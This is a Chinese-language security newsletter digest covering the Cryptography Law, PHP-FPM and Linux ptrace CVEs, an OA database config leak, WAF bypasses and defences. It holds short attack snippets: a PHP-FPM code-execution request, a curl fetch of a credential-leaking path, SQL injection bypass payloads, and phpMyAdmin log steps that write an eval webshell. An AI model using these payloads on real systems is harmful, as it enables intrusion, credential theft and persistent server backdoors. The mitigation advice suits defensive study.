专注Web及移动安全[红日安全103期]
字数 2122 2025-08-18 11:39:08
红日安全103期 - Web及移动安全技术深度解析
一、安全动态与漏洞分析
1.1 中华人民共和国密码法解读
- 密码法是我国密码领域的第一部法律,规范了密码应用和管理
- 核心内容包括:密码分类管理、商用密码管理制度、密码安全评估要求
- 对网络安全从业者的影响:商用密码产品需通过检测认证,密码服务需行政许可
1.2 CVE-2019-11043 PHP-FPM漏洞复现
漏洞背景:
- 影响版本:PHP 7.1.x < 7.1.33, 7.2.x < 7.2.24, 7.3.x < 7.3.11
- 触发条件:Nginx + PHP-FPM特定配置环境下
漏洞原理:
- 由于Nginx对PATH_INFO处理不当,导致PHP-FPM可以执行任意代码
- 关键点在于fastcgi_split_path_info正则表达式配置问题
复现步骤:
- 搭建漏洞环境:Nginx + 受影响PHP版本
- 构造恶意请求:
GET /index.php/PHP_VALUE%0Asystem%28id%29%3B HTTP/1.1 Host: target - 利用工具:使用phuip-fpizdam自动化利用工具
修复方案:
- 升级PHP至安全版本
- 修改Nginx配置,严格限制PATH_INFO处理
1.3 CVE-2019-13272 Linux本地提权漏洞
漏洞详情:
- 影响内核版本:Linux kernel < 5.1.17
- 漏洞类型:条件竞争导致的内核内存破坏
利用方法:
- 通过PTRACE_TRACEME创建竞争条件
- 利用错误处理路径获取root权限
- 典型利用代码结构:
if (fork() == 0) { ptrace(PTRACE_TRACEME); kill(getpid(), SIGSTOP); // 竞争操作... }
缓解措施:
- 升级内核至5.1.17或更高版本
- 限制普通用户使用ptrace功能
1.4 泛微e-cology OA数据库信息泄露
漏洞特征:
- 影响版本:多个泛微e-cology OA版本
- 泄露路径:/mobile/DBconfigReader.jsp
- 泄露内容:数据库连接字符串、用户名密码等敏感信息
检测方法:
curl http://target/mobile/DBconfigReader.jsp
修复建议:
- 删除或限制访问DBconfigReader.jsp
- 修改数据库密码
- 应用最新补丁
二、Web安全实战技术
2.1 SQL注入绕过WAF技巧
常见绕过方法:
- 注释混淆:
SELECT/*xxx*/user/*xxx*/FROM/*xxx*/admin - 空白符替换:使用
%09,%0a,%0c等替代空格 - 大小写混合:
SeLeCt替代select - 等价函数替换:
mid()替代substring() - 编码混淆:十六进制、URL编码、Unicode编码
实战案例:
- 通过注释和空白符绕过云WAF:
union%0a/*!12345select*/1,2,3--
2.2 WebShell获取与利用
常见获取途径:
- 文件上传漏洞
- 数据库日志文件写入(如phpmyadmin)
- 模板注入漏洞
- 文件包含漏洞
phpMyAdmin日志Getshell:
- 开启general_log:
set global general_log='on'; set global general_log_file='/var/www/html/shell.php'; - 写入PHP代码:
select '<?php eval($_POST[cmd]);?>';
防护措施:
- 限制数据库账户权限
- 关闭不必要的日志功能
- 设置日志目录不可执行
三、渗透测试技术精要
3.1 弱口令攻击防御
常见弱口令组合:
- 用户名密码相同:admin/admin
- 简单数字序列:123456, 111111
- 常见单词:password, qwerty
防御策略:
- 强制密码复杂度策略
- 实施多因素认证
- 账户锁定机制
- 定期密码更换
3.2 CMS后台Getshell技术
典型漏洞利用链:
- 通过弱口令或默认凭证进入后台
- 利用模板编辑功能写入WebShell
- 通过插件/模块上传功能上传恶意文件
某颜色CMS案例:
- 后台路径:/admin/login.php
- Getshell路径:通过模板管理编辑php文件
- 持久化方法:写入数据库后门
四、安全工具使用指南
4.1 在线信息收集工具
-
子域名查询:
- 使用DNS记录查询
- 基于证书透明度日志
- 常用工具:Sublist3r, Amass
-
旁站/C段查询:
- 基于IP反查域名
- 使用Bing/Shodan搜索
- 风险:可能触发IDS/IPS
4.2 LANscan域解析工具
功能特点:
- 多线程设计,扫描速度快
- 支持顶级域批量解析
- 结果导出为多种格式
使用场景:
- 内网渗透测试
- 资产发现与管理
- 安全审计
五、防御体系建设
5.1 Web应用安全监控
日志监控要点:
- 异常请求模式检测
- SQL注入特征匹配
- 文件包含/目录遍历尝试
- 敏感文件访问记录
实施方法:
- 使用ELK Stack收集分析日志
- 部署WAF规则实时防护
- 定期漏洞扫描
5.2 安全开发实践
- 输入验证:白名单优于黑名单
- 输出编码:防范XSS
- 参数化查询:防止SQL注入
- 最小权限原则:限制服务账户权限
六、附录:参考资源
- PHP-FPM漏洞官方修复:https://www.php.net/ChangeLog-7.php
- Linux内核漏洞公告:https://www.kernel.org/
- 密码法全文:http://www.gov.cn/xinwen/2019-10/27/content_5445617.htm
- Web安全测试工具集:OWASP ZAP, Burp Suite
本教学文档基于红日安全103期内容整理,涵盖了Web及移动安全领域的核心知识点,包括漏洞分析、渗透技术、防御措施等多个维度。建议读者结合实际环境进行测试验证,并始终遵守法律法规。